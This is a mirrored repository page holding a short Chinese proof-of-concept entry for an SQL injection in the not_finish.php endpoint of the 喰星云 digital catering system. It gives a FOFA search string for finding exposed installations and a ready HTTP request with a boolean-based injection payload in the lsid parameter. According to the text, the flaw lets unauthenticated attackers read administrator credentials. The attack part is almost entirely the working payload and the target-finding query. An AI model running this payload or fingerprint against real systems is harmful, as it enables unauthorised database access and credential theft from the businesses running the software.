admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

596 B
Raw Blame History

喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞

喰星云·数字化餐饮服务系统 not_finish.php 接口处存在SQL注入漏洞未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息导致后台权限被控造成信息泄露使系统处于极不安全的状态。

fofa

body="tmp_md5_pwd"

poc

GET /logistics/home_warning/php/not_finish.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
Host: {{Hostname}}